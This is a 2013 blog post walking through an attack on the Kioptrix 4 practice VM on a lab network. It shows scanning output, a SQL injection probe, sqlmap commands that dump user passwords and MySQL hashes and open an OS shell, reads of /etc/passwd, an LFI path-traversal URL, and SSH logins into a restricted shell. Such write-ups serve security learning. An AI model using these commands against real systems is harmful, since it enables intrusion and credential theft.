2013. november 20., szerda

Kioptrix 4

root@kali:~# netdiscover

 Currently scanning: 192.168.88.0/16   |   Screen View: Unique Hosts                                                              

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180

 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS                                                 
192.168.56.100  08:00:27:23:30:51    01    060   CADMUS COMPUTER SYSTEMS                                                         
 192.168.56.103  08:00:27:e0:cd:64    01    060   CADMUS COMPUTER SYSTEMS                                                         
          
root@kali:~# unicornscan 192.168.56.103
TCP open                http[   80]        from 192.168.56.103  ttl 64

root@kali:~# nikto -host 192.168.56.103
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.103
+ Target Hostname:    192.168.56.103
+ Target Port:        80
+ Start Time:         2013-11-19 14:22:55 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 6544 items checked: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2013-11-19 14:23:06 (GMT1) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb http://192.168.56.103/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------
START_TIME: Tue Nov 19 14:23:42 2013
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592                                                         
---- Scanning URL: http://192.168.56.103/ ----
+ http://192.168.56.103/cgi-bin/ (CODE:403|SIZE:329)                                                                              
                         
==> DIRECTORY: http://192.168.56.103/images/                                                                                      
                         
+ http://192.168.56.103/index (CODE:200|SIZE:1255)                                                                                
                         
+ http://192.168.56.103/index.php (CODE:200|SIZE:1255)                                                                            
                         
==> DIRECTORY: http://192.168.56.103/john/                                                                                        
                         
+ http://192.168.56.103/logout (CODE:302|SIZE:0)                                                                                  
                         
+ http://192.168.56.103/member (CODE:302|SIZE:220)                                                                                
                         
+ http://192.168.56.103/server-status (CODE:403|SIZE:334)                                                                                                   
                                                                                                                                                            
---- Entering directory: http://192.168.56.103/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.56.103/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                       
    (Use mode '-w' if you want to scan it anyway)                                                                              
-----------------
DOWNLOADED: 4592 - FOUND: 6

Mantra http://192.168.56.103/

Login

Load url
http://192.168.56.103/checklogin.php

Enable Post data
myusername=admin&mypassword='pass&Submit=Login
execute

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28

root@kali:~# sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login"

--dbs

available databases [3]:
[*] information_schema
[*] members
[*] mysql

...

sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" -D members -T members -C id,password,username --dump

+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+


http://192.168.56.103/john/

http://192.168.56.103/robert/

http://192.168.56.103/john/john.php
http://192.168.56.103/robert/robert.php

sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" -D mysql -T user -C Host,User,Password --dump

+-----------+------------------+-------------------------------------------+
| Host      | User             | Password                                  |
+-----------+------------------+-------------------------------------------+
| 127.0.0.1 | root             |                                    |
| Kioptrix4 |           |                                    |
| Kioptrix4 | root             |                                    |
| localhost |           |                                    |
| localhost | debian-sys-maint | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
| localhost | root             | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
+-----------+------------------+-------------------------------------------+





--os-shell

os-shell> cat /etc/passwd
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
---

os-shell> cat /etc/group
...
admin:x:115:loneferret
...

os-shell> ls /var/www
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
checklogin.php
database.sql
images
index.php
john
login_success.php
logout.php
member.php
robert
tmpbjbbq.php
tmpbtahr.php
tmpueovq.php
tmpuxztg.php

os-shell> cat /var/www/login_success.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
session_start();
if(!session_is_registered(myusername)){
    header("location:index.php");
}else{
    $id=$_GET['username'];
     header("location:member.php?username=$id");
}
?>

os-shell> cat /var/www/member.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
session_start();
if(!session_is_registered(myusername)){
        header("location:index.php");
}

$page = $_GET['username'];

//$page = preg_replace('/etc/','',$page,1) . ".php";
$page = preg_replace('/etc/','',$page,1);

if(file_exists($page)){
    $memPage = $page . "/" . $page . ".php";
    include($memPage);
}else{
    print ("User " .$page.'<br><br>');
    print("Oups, something went wrong with your member's page account.<br>Please contact your local Administrator<br> to fix

the issue.");
    print ('<br>');
    print('<form method="link" action="index.php"><input type=submit value="Back"></form>');
}
?>
---
...
http://192.168.56.102/member.php?username=/etc/etc/passwd% 0 0

This is an LFI

os-shell> netstat -nap | grep tcp
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      4375/sh        
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -              
tcp        0      0 192.168.56.103:80       192.168.56.101:43597    ESTABLISHED 4375/sh        
---

root@kali:/var/www/phpshells# nmap -sS 192.168.56.103

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-19 15:26 CET
Nmap scan report for 192.168.56.103
Host is up (0.00025s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:E0:CD:64 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 15.42 seconds

root@kali:/var/www/phpshells# ssh john@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (RSA) to the list of known hosts.
john@192.168.56.103's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ john:~$ pwd
*** unknown command: pwd
john:~$ ls
john:~$ id
*** unknown command: id
john:~$ ls
john:~$ ls /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.


os-shell> ls -al /home/john
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
total 28
drwxr-xr-x 2 john john 4096 Feb  4  2012 .
drwxr-xr-x 5 root root 4096 Feb  4  2012 ..
-rw------- 1 john john   61 Feb  4  2012 .bash_history
-rw-r--r-- 1 john john  220 Feb  4  2012 .bash_logout
-rw-r--r-- 1 john john 2940 Feb  4  2012 .bashrc
-rw-r--r-- 1 john john  118 Feb  4  2012 .lhistory
-rw-r--r-- 1 john john  586 Feb  4  2012 .profile

os-shell> cat /home/john/.profile
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
    . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

john:~$
john:~$ echo $PATH
*** forbidden path -> "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games"
*** Kicked out
Connection to 192.168.56.103 closed.

root@kali:/var/www/phpshells# ssh robert@192.168.56.103
robert@192.168.56.103's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls


robert:~$ lpath
Allowed:
 /home/robert


That's all. I have not found the solution. My current goal was to identify the vulnerabilities. Currently, my knowledge is not enough to privilege escalation.

Nincsenek megjegyzések:

Megjegyzés küldése

Megjegyzés: Megjegyzéseket csak a blog tagjai írhatnak a blogba.